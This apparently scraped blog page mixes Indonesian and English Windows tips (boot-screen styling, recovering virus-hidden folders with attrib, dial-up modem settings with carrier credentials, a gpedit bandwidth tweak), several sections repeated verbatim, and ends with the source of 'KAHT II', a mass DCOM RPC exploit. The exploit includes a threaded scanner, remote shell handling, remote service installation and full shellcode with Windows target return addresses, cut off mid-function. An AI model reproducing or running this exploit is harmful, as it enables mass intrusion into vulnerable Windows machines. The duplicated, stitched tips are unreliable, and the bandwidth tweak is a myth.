1.How to Change Windows Boot Screen?
* First of all Download Tuneup Utilities.
* Open Tuneup Utilities --> Tuneup Styler --> Change Windows Xp Boot Screen
* You can create your own Boot Screen by Clicking on Add -- > Load Boot screen from File
* Browse for an Attractive Picture and Click Save Boot Screen Option .
2.How to Change windows Logon Screen?
* Here also we are going to use Tuneup Utilities.
* Download Welcome Screen from here
* http://www.wincustomize.com/skins.aspx?libid=26
* Open Tuneup Utilities --> Tuneup Styler --> Select Windows Xp Welcome Screen
* Click Add and select the downloaded the Welcome screen
Say Hello
Selasa, 04 Januari 2011
Menghilangkan virus shortcut pada komputer
* pada windows explorer masuk kedalam menu Tools , kemudian click pada sub menu folder option . untuk shortcut-nya dapat menggunakan ALT+T kemudian tekan tombol O .
* Masuk pada tab view dengan cara langsung meng-click atau menekan CLTR+TAB sebanyak satu kali untuk berpindah dari tab general ke tab view.
* Kemudian berikan chek list pada show hidden file and folder . lalu click OK .
Namun apabila telah mencoba seperti cara diatas tetapi folder yang sedang kita cari tetap tidak tampil, maka dapat disimpulkan komputer tersebut terinveksi virus yang berekstensi *.scr .
Cara kerja virus ini sangat sederhana, yaitu merubah setiap folder yang ada di komputer (baik local harddisck maupun removable disck) menjadi file applikasi dengan kapasitas yang digandakan sebesar 32 Kb. dan ketika coba di bersihkan (scaning) menggunakan antivirus dari salah satu vendor, virus tersebut dapat di hilangkan namun effect yang ditimbulkan dari proses scanning tersebut adalah folder-folder yang terserang virus ini menjadi hilang.
Sebenarnya folder tersebut tidak hilang, namun hanya disembunyikan saja (hidden). Folder yang hilang tersebut dapat kita kembalikan dengan menggunakan perintah attrib pada command prompt . Caranya sangat sederhana sekali, namun sebelum mengupas bagaimana cara mengembalikan Folder yang hilang tersebut, mari kita bahas sedikit tentang attribute ini.
Untuk melihat Properties attribute dapat dilakukan dengan beberapa cara. namun dalam kesempatan ini akan dijelaskan menggunakan command promt .
Command attribute bekerja pada DOS command prompt, memiliki beberapa fungsi, salah satunya adalah untuk men-set attribute dari suatu file apakah file tersebut akan diberi attribute antara lain:
* read-only file attribute
* Archive file attribute
* System File Attribut
* Hidden File Attribut
Adapun tahapan untuk mengembalikan folder yang hilang menggunakan command promt adalah sebagai berikut :
1. Masuk kedalam menu Start kemudian pilih RUN .
2. Maka akan terbuka jendela RUN, lalu ketikkan kata cmd kemudian tekan enter .
3. Setelah jendela command promt terbuka, kemudian ketikan attrib /? Untuk mengetahui beberapa perintah pada properties attribute melalui command prompt.
4. Selanjutnya pada prompt tersebut akan muncul sederatan kalimat yang menjelaskan tentang attribute seperti :
* Tanda (+) untuk sets an attribute.
* Tanda (– ) untuk Clears an attribute.
* Huruf R untuk read-only file attribute.
* Huruf A untuk Archive file attribute.
* Huruf S untuk System file attribute.
* Huruf H untuk Hidden file attribute.
* /S untuk proses penyamaan file di dalam folder sebelumnya dan semua subfolder yang ada di komputer.
* /D untuk proses yang akan dilakukan terhadap folder itu sendiri.
5. Kembali kepembahasan awal, untuk kasus Folder yang hilang tersebut, maka perintah yang kita ketikkan pada command prompt ini adalah :
* Ketikkan C:> atau D:> atau drive tempat folder yang hilang , kemudian tekan enter .
* Kemudian ketikan attrib –s –h *.* /S /D
6. Langkah terakhir adalah keluar dari jendela command promt kemudian refresh komputer, (shortcut F5 ).
Sekarang perhatikan perubahan yang terjadi pada komputer, folder yang hilang telah ditampilkan kembali. Jadi tidak perlu khawatir lagi dengan folder yang hilang karena terserang virus berekstensi *.scr.
* Masuk pada tab view dengan cara langsung meng-click atau menekan CLTR+TAB sebanyak satu kali untuk berpindah dari tab general ke tab view.
* Kemudian berikan chek list pada show hidden file and folder . lalu click OK .
Namun apabila telah mencoba seperti cara diatas tetapi folder yang sedang kita cari tetap tidak tampil, maka dapat disimpulkan komputer tersebut terinveksi virus yang berekstensi *.scr .
Cara kerja virus ini sangat sederhana, yaitu merubah setiap folder yang ada di komputer (baik local harddisck maupun removable disck) menjadi file applikasi dengan kapasitas yang digandakan sebesar 32 Kb. dan ketika coba di bersihkan (scaning) menggunakan antivirus dari salah satu vendor, virus tersebut dapat di hilangkan namun effect yang ditimbulkan dari proses scanning tersebut adalah folder-folder yang terserang virus ini menjadi hilang.
Sebenarnya folder tersebut tidak hilang, namun hanya disembunyikan saja (hidden). Folder yang hilang tersebut dapat kita kembalikan dengan menggunakan perintah attrib pada command prompt . Caranya sangat sederhana sekali, namun sebelum mengupas bagaimana cara mengembalikan Folder yang hilang tersebut, mari kita bahas sedikit tentang attribute ini.
Untuk melihat Properties attribute dapat dilakukan dengan beberapa cara. namun dalam kesempatan ini akan dijelaskan menggunakan command promt .
Command attribute bekerja pada DOS command prompt, memiliki beberapa fungsi, salah satunya adalah untuk men-set attribute dari suatu file apakah file tersebut akan diberi attribute antara lain:
* read-only file attribute
* Archive file attribute
* System File Attribut
* Hidden File Attribut
Adapun tahapan untuk mengembalikan folder yang hilang menggunakan command promt adalah sebagai berikut :
1. Masuk kedalam menu Start kemudian pilih RUN .
2. Maka akan terbuka jendela RUN, lalu ketikkan kata cmd kemudian tekan enter .
3. Setelah jendela command promt terbuka, kemudian ketikan attrib /? Untuk mengetahui beberapa perintah pada properties attribute melalui command prompt.
4. Selanjutnya pada prompt tersebut akan muncul sederatan kalimat yang menjelaskan tentang attribute seperti :
* Tanda (+) untuk sets an attribute.
* Tanda (– ) untuk Clears an attribute.
* Huruf R untuk read-only file attribute.
* Huruf A untuk Archive file attribute.
* Huruf S untuk System file attribute.
* Huruf H untuk Hidden file attribute.
* /S untuk proses penyamaan file di dalam folder sebelumnya dan semua subfolder yang ada di komputer.
* /D untuk proses yang akan dilakukan terhadap folder itu sendiri.
5. Kembali kepembahasan awal, untuk kasus Folder yang hilang tersebut, maka perintah yang kita ketikkan pada command prompt ini adalah :
* Ketikkan C:> atau D:> atau drive tempat folder yang hilang , kemudian tekan enter .
* Kemudian ketikan attrib –s –h *.* /S /D
6. Langkah terakhir adalah keluar dari jendela command promt kemudian refresh komputer, (shortcut F5 ).
Sekarang perhatikan perubahan yang terjadi pada komputer, folder yang hilang telah ditampilkan kembali. Jadi tidak perlu khawatir lagi dengan folder yang hilang karena terserang virus berekstensi *.scr.
cara melacak ip secara manual
- Open 'Run' pada windows
- type 'cmd' lalu 'Enter'
- type 'cd\' lalu 'Enter', kemudian type 'netstat' >>>>tunggu sampai proses selesai
- lihat pada 'foreign address' ip mana yang hendak di telusuri kemudian type 'tracert ping ............. -d'
- keterangan : -d (don't resolve addresses to hostnames), -h (maximum_hops), -j (host-list), -w (timeout)
- setelah dapat baru kita masuk ke site 'http://www.ip-adress.com'
- anda akan mengetahui keberadaan ip yang masuk pada anda ^__^
setting modem pada handphone
Berikut settingan beberapa profider mulai gsm dan cdma, kalo ada yang kurang silahkan di tambahi.
Persiapan:
A.Peralatan yang di perlukan:
1. Sebuah HP yang support GPRS, dan sudah bisa koneksi dengan GPRS.
2. Kartu telepon / sim card.
3. Personal computer boleh juga laptop.
4. Perangkat koneksi, dari HP ke PC. Boleh pakai kabel data, Bluetooth, atau IrDA (Infrared Data Adapter). Berikut dengan drivernya yang sudah diinstall. Pokoknya sudah bisa kirim-kiriman antara PC dan HP.
5. Tancapkan hanphone yang sudah aktif gprsnya (pastikan kondisi on) dengan kabel data ke usb komputer anda. Bila file driver telah ada di komputer maka secara otomatis akan mendeteksi dengan sendiri. bila tidak lakukan penginstalan driver secara manual.
B.Setting Modem
Start >> control panel >> Phone and Modem Options>> akan muncul daftar modem yang udah terdeteksi oleh komputer beserta portnya bisa com2, com7 dst. Bila sudah ada berarti terdeteksi bila belum bisa di pastikan salah satu setingan belum lengkap, periksa kabel data dan hidupkan hanphone anda.
Untuk memastikan koneksi antara pc dengan hanphone secara manual, silahkan sorot nama modem anda lalu pilih properties, di tab general akan tertera nama modem hape anda, lalau pilih diagnostics lalu query modem, bila tertera success berarti komunikasi oke.
Silahkan lihat bagian tab advanced, lalu di bagian extra setting masukkan kode dibawah ini: – lalu ok.
Kode extra setting
AT+CGDCONT=1,”IP”, “Acsess poin name operator”
Sebagai catatan: Acsess poin name merupakan variable yang senantiasa bisa berubah, kita sesuaikan dengan kartu hanphone yang kita pakai.
Contoh: anda memakai kartu im3 sebagai kartu hanphone yang anda gunakan sebagai modem handphone, maka settingannya kan jadi sebagai berikut:
AT+CGDCONT=1,”IP”,”www.indosat-im3.net”
Berikut settingan kode untuk masing masing operator:
AT+CGDCONT=1,”IP”,”www.indosat-im3.net” untuk im3
AT+CGDCONT=1,”IP”,”satelindogprs.com” untuk matrix dan mentari
AT+CGDCONT=1,”IP”,”internet” untuk telkomsel
AT+CGDCONT=1,”IP”,”xlgprs.net” untuk xl
C.Melakukan koneksi / membuat dial up:
1. Buka Control Panel lagi,
2. Pilih Network Connections,
3. New Connection Wizard.
4. Ikuti langkah-langkahnya dengan menekan Next…
5. Untuk Connection Type, pilih Connect to the Internet
6. Getting Ready, pilih Set up my connection manually
7. Internet Connection, pilih Connect using a dial-up modem
8. Pada connection name / isp name isikan nama terserah anda misal konekyuk (sebagai nama koneksi anda)
9. Pada Phone number to dial, isikan *99***1# (lihat daftar di bawah untuk cdma berbeda)
10. Pada dialog pengisian username dan password, sesuaikan dengan setting kartu anda. Jika menggunakan IM3, usernamenya gprs dan passwordnya im3 (lihat daftar di bawah. silahkan di sesuaikan sendiri.
Daftar username dan password serta dial number gsm dan cdma:
Telkomsel
username: wap
password: wap123
dial number : *99***1#
Mentari
username: indosat
password: indosat
dial number : *99***1#
Matrix
username: silahkan di kosongi
password: silahkan dikosongi
dial number : *99***1#
Xl
username: xlgprs
password: proxl
dial number : *99***1#
Im3 ( yang berdasarkan kb )
username: gprs
password: im3
dial number : *99***1#
Im3 ( yang berdasarkan waktu/ time base )
username: indosat@durasi
password: indosat@durasi
dial number : *99***1#
Fren
username: m8
password: m8
dial number : #777
Telkom Flexy
username: telkomnet@flexy
password: telkom
dial number : #777
Starone
username: starone
password: indosat
dial number : #777
Catatan : angka 1 di dalam setingan dial number silahkan disesuaikan dengan banyaknya koneksi internet yang ada di komputer anda. contoh anda memiliki 2 macam koneksi internet dari pc anda maka dial number bisa diisi: *99***2# dst.
Persiapan:
A.Peralatan yang di perlukan:
1. Sebuah HP yang support GPRS, dan sudah bisa koneksi dengan GPRS.
2. Kartu telepon / sim card.
3. Personal computer boleh juga laptop.
4. Perangkat koneksi, dari HP ke PC. Boleh pakai kabel data, Bluetooth, atau IrDA (Infrared Data Adapter). Berikut dengan drivernya yang sudah diinstall. Pokoknya sudah bisa kirim-kiriman antara PC dan HP.
5. Tancapkan hanphone yang sudah aktif gprsnya (pastikan kondisi on) dengan kabel data ke usb komputer anda. Bila file driver telah ada di komputer maka secara otomatis akan mendeteksi dengan sendiri. bila tidak lakukan penginstalan driver secara manual.
B.Setting Modem
Start >> control panel >> Phone and Modem Options>> akan muncul daftar modem yang udah terdeteksi oleh komputer beserta portnya bisa com2, com7 dst. Bila sudah ada berarti terdeteksi bila belum bisa di pastikan salah satu setingan belum lengkap, periksa kabel data dan hidupkan hanphone anda.
Untuk memastikan koneksi antara pc dengan hanphone secara manual, silahkan sorot nama modem anda lalu pilih properties, di tab general akan tertera nama modem hape anda, lalau pilih diagnostics lalu query modem, bila tertera success berarti komunikasi oke.
Silahkan lihat bagian tab advanced, lalu di bagian extra setting masukkan kode dibawah ini: – lalu ok.
Kode extra setting
AT+CGDCONT=1,”IP”, “Acsess poin name operator”
Sebagai catatan: Acsess poin name merupakan variable yang senantiasa bisa berubah, kita sesuaikan dengan kartu hanphone yang kita pakai.
Contoh: anda memakai kartu im3 sebagai kartu hanphone yang anda gunakan sebagai modem handphone, maka settingannya kan jadi sebagai berikut:
AT+CGDCONT=1,”IP”,”www.indosat-im3.net”
Berikut settingan kode untuk masing masing operator:
AT+CGDCONT=1,”IP”,”www.indosat-im3.net” untuk im3
AT+CGDCONT=1,”IP”,”satelindogprs.com” untuk matrix dan mentari
AT+CGDCONT=1,”IP”,”internet” untuk telkomsel
AT+CGDCONT=1,”IP”,”xlgprs.net” untuk xl
C.Melakukan koneksi / membuat dial up:
1. Buka Control Panel lagi,
2. Pilih Network Connections,
3. New Connection Wizard.
4. Ikuti langkah-langkahnya dengan menekan Next…
5. Untuk Connection Type, pilih Connect to the Internet
6. Getting Ready, pilih Set up my connection manually
7. Internet Connection, pilih Connect using a dial-up modem
8. Pada connection name / isp name isikan nama terserah anda misal konekyuk (sebagai nama koneksi anda)
9. Pada Phone number to dial, isikan *99***1# (lihat daftar di bawah untuk cdma berbeda)
10. Pada dialog pengisian username dan password, sesuaikan dengan setting kartu anda. Jika menggunakan IM3, usernamenya gprs dan passwordnya im3 (lihat daftar di bawah. silahkan di sesuaikan sendiri.
Daftar username dan password serta dial number gsm dan cdma:
Telkomsel
username: wap
password: wap123
dial number : *99***1#
Mentari
username: indosat
password: indosat
dial number : *99***1#
Matrix
username: silahkan di kosongi
password: silahkan dikosongi
dial number : *99***1#
Xl
username: xlgprs
password: proxl
dial number : *99***1#
Im3 ( yang berdasarkan kb )
username: gprs
password: im3
dial number : *99***1#
Im3 ( yang berdasarkan waktu/ time base )
username: indosat@durasi
password: indosat@durasi
dial number : *99***1#
Fren
username: m8
password: m8
dial number : #777
Telkom Flexy
username: telkomnet@flexy
password: telkom
dial number : #777
Starone
username: starone
password: indosat
dial number : #777
Catatan : angka 1 di dalam setingan dial number silahkan disesuaikan dengan banyaknya koneksi internet yang ada di komputer anda. contoh anda memiliki 2 macam koneksi internet dari pc anda maka dial number bisa diisi: *99***2# dst.
Menambah bandwidth internet
1. Click Start
2. Run
3. ketik gpedit.msc
4. Akan tampil Group Policy Editor
5. Tekan Local Computer Policy
6. Tekan Computer Configuration
7. Tekan Administrative Templates
8. Tekan Network
9. Tekan QOS Packet Scheduler
10. Limit Reservable Bandwidth
11. Pilih Enable lalu Bandwidth limit isi (%) isi dengan 0 (defaultnya 20)
12. Apply n Ok
2. Run
3. ketik gpedit.msc
4. Akan tampil Group Policy Editor
5. Tekan Local Computer Policy
6. Tekan Computer Configuration
7. Tekan Administrative Templates
8. Tekan Network
9. Tekan QOS Packet Scheduler
10. Limit Reservable Bandwidth
11. Pilih Enable lalu Bandwidth limit isi (%) isi dengan 0 (defaultnya 20)
12. Apply n Ok
Blue screen on monitor computer
Steps to Disable Auto Restart
* CLICK Start Menu / Settings / Control Panel
* CLICK 'System' icon
* CLICK 'Advanced' tab
* CLICK 'Settings' button to the right of the 'Start up and Recovery' section
* CLICK to uncheck the 'Automatically Restart' box
* CLICK 'OK'
Reboot Manually
After doing this, you will have to reboot manually if you have a major error on your computer or a system failure.
* CLICK Start Menu / Settings / Control Panel
* CLICK 'System' icon
* CLICK 'Advanced' tab
* CLICK 'Settings' button to the right of the 'Start up and Recovery' section
* CLICK to uncheck the 'Automatically Restart' box
* CLICK 'OK'
Reboot Manually
After doing this, you will have to reboot manually if you have a major error on your computer or a system failure.
KaHt code
/*
__________________________________________________
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
REALLY PRIVATE VERSION (BETA 11) - AUTOHACKING
Ported to Linux by Croulder croulder[at]croulder.com
__________________________________________________
*/
#include <stdio.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include <unistd.h>
#include <windows.h>
#include <process.h>
#include <winsock2.h>
#include <tcconio.h>
#pragma comment (lib,"ws2_32.lib")
#else
#include <pthread.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/sem.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>
#endif
#define MAX_THREADS 512
#define NTHREADS 50
#define PORT 139
#define CONNECT 6 //Connect Timeout
#define RECV 5 //recv Timeout
#define ATTACKTIMEOUT 5 //
#define RPC_FINGERPRINT_TIMEOUT 6 //rpc fingerprint
#define INITRPORT (rand()/2)+32767
//#define INITRPORT 53 //PORT TO SPAWN A SHELL
int RPORT,salir=0,AUTOHACKING=0,threads=0,rpcopen=0;
int ip1[4],ip2[4];
FILE *results; //results.txt ips con el puerto 139 abierto :D
#ifndef WIN32
#define CRITICAL_SECTION pthread_t
#endif
CRITICAL_SECTION cs,css,cslog,csshell; //Givemeip CS, number of threads, ipstologfile,shell()
//Ultra Fast port Scanner
char *givemeip(char *ip);
void checkea(void *threadn);
//Macro Functions..
void show_macros(int sock2);
void execute_macro(char opt,int sock2);
void macro(char opt, int sock2);
//Exploit Code...
void attack(char *linea,int peta);
int shell (int sock2);
void readconsole(void *sock2);
//me
void banner(void);
// remote Install
int InstallRemoteServiceNbt (char *ip);
int InstallRemoteServiceFtp (char *ip);
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char winshellcode[]=
"\x05\x00\x00\x03\x10\x00\x00\x00\xa8\x06\x00\x00\xe5\x00\x00\x00"
"\x90\x06\x00\x00\x01\x00\x04\x00\x05\x00\x06\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x32\x24\x58\xfd\xcc\x45\x64\x49\xb0\x70\xdd\xae"
"\x74\x2c\x96\xd2\x60\x5e\x0d\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x70\x5e\x0d\x00\x02\x00\x00\x00\x7c\x5e\x0d\x00\x00\x00\x00\x00"
"\x10\x00\x00\x00\x80\x96\xf1\xf1\x2a\x4d\xce\x11\xa6\x6a\x00\x20"
"\xaf\x6e\x72\xf4\x0c\x00\x00\x00\x4d\x41\x52\x42\x01\x00\x00\x00"
"\x00\x00\x00\x00\x0d\xf0\xad\xba\x00\x00\x00\x00\xa8\xf4\x0b\x00"
"\x20\x06\x00\x00\x20\x06\x00\x00\x4d\x45\x4f\x57\x04\x00\x00\x00"
"\xa2\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
"\x38\x03\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
"\x00\x00\x00\x00\xf0\x05\x00\x00\xe8\x05\x00\x00\x00\x00\x00\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\xc8\x00\x00\x00\x4d\x45\x4f\x57"
"\xe8\x05\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
"\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xc4\x28\xcd\x00\x64\x29\xcd\x00\x00\x00\x00\x00"
"\x07\x00\x00\x00\xb9\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xab\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xa5\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xa6\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xa4\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xad\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xaa\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\x07\x00\x00\x00\x60\x00\x00\x00\x58\x00\x00\x00"
"\x90\x00\x00\x00\x40\x00\x00\x00\x20\x00\x00\x00\x38\x03\x00\x00"
"\x30\x00\x00\x00\x01\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc"
"\x50\x00\x00\x00\x4f\xb6\x88\x20\xff\xff\xff\xff\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc"
"\x48\x00\x00\x00\x07\x00\x66\x00\x06\x09\x02\x00\x00\x00\x00\x00"
"\xc0\x00\x00\x00\x00\x00\x00\x46\x10\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x78\x19\x0c\x00"
"\x58\x00\x00\x00\x05\x00\x06\x00\x01\x00\x00\x00\x70\xd8\x98\x93"
"\x98\x4f\xd2\x11\xa9\x3d\xbe\x57\xb2\x00\x00\x00\x32\x00\x31\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x80\x00\x00\x00\x0d\xf0\xad\xba"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x18\x43\x14\x00\x00\x00\x00\x00\x60\x00\x00\x00\x60\x00\x00\x00"
"\x4d\x45\x4f\x57\x04\x00\x00\x00\xc0\x01\x00\x00\x00\x00\x00\x00"
"\xc0\x00\x00\x00\x00\x00\x00\x46\x3b\x03\x00\x00\x00\x00\x00\x00"
"\xc0\x00\x00\x00\x00\x00\x00\x46\x00\x00\x00\x00\x30\x00\x00\x00"
"\x01\x00\x01\x00\x81\xc5\x17\x03\x80\x0e\xe9\x4a\x99\x99\xf1\x8a"
"\x50\x6f\x7a\x85\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x30\x00\x00\x00\x78\x00\x6e\x00"
"\x00\x00\x00\x00\xd8\xda\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x20\x2f\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00"
"\x00\x00\x00\x00\x03\x00\x00\x00\x46\x00\x58\x00\x00\x00\x00\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x10\x00\x00\x00\x30\x00\x2e\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x68\x00\x00\x00\x0e\x00\xff\xff"
"\x68\x8b\x0b\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x86\x01\x00\x00\x00\x00\x00\x00\x86\x01\x00\x00\x5c\x00\x5c\x00"
"\x46\x00\x58\x00\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x9f\x75\x18\x00\xcc\xe0\xfd\x7f\xcc\xe0\xfd\x7f"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\x40\xa1\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04\x00\x5c\x00\x43\x00"
"\x24\x00\x5c\x00\x31\x00\x32\x00\x33\x00\x34\x00\x35\x00\x36\x00"
"\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00"
"\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x2e\x00"
"\x64\x00\x6f\x00\x63\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc"
"\x20\x00\x00\x00\x30\x00\x2d\x00\x00\x00\x00\x00\x88\x2a\x0c\x00"
"\x02\x00\x00\x00\x01\x00\x00\x00\x28\x8c\x0c\x00\x01\x00\x00\x00"
"\x07\x00\x00\x00\x00\x00\x00\x00";
struct
{
char *os;
u_long ret;
} targets[] =
{
{ "[Win2k]", 0x0018759F },
{ "[WinXP]", 0x0100139d },
};
//GLOBALS...
/******************************************************************/
void banner(void)
{
printf ("_________________________________________________ \n");
printf(" KAHT II - MASSIVE RPC EXPLOIT\n");
printf(" DCOM RPC exploit. Modified by aT4r@3wdesign.es\n");
printf(" #haxorcitos && #localhost @Efnet Ownz you!!!\n");
printf(" PUBLIC VERSION :P\n");
printf ("________________________________________________\n\n");
}
void usage(void)
{
printf(" Usage: KaHt2.exe IP1 IP2 [THREADS] [AH]\n");
printf(" example: KaHt2.exe 192.168.0.0 192.168.255.255\n");
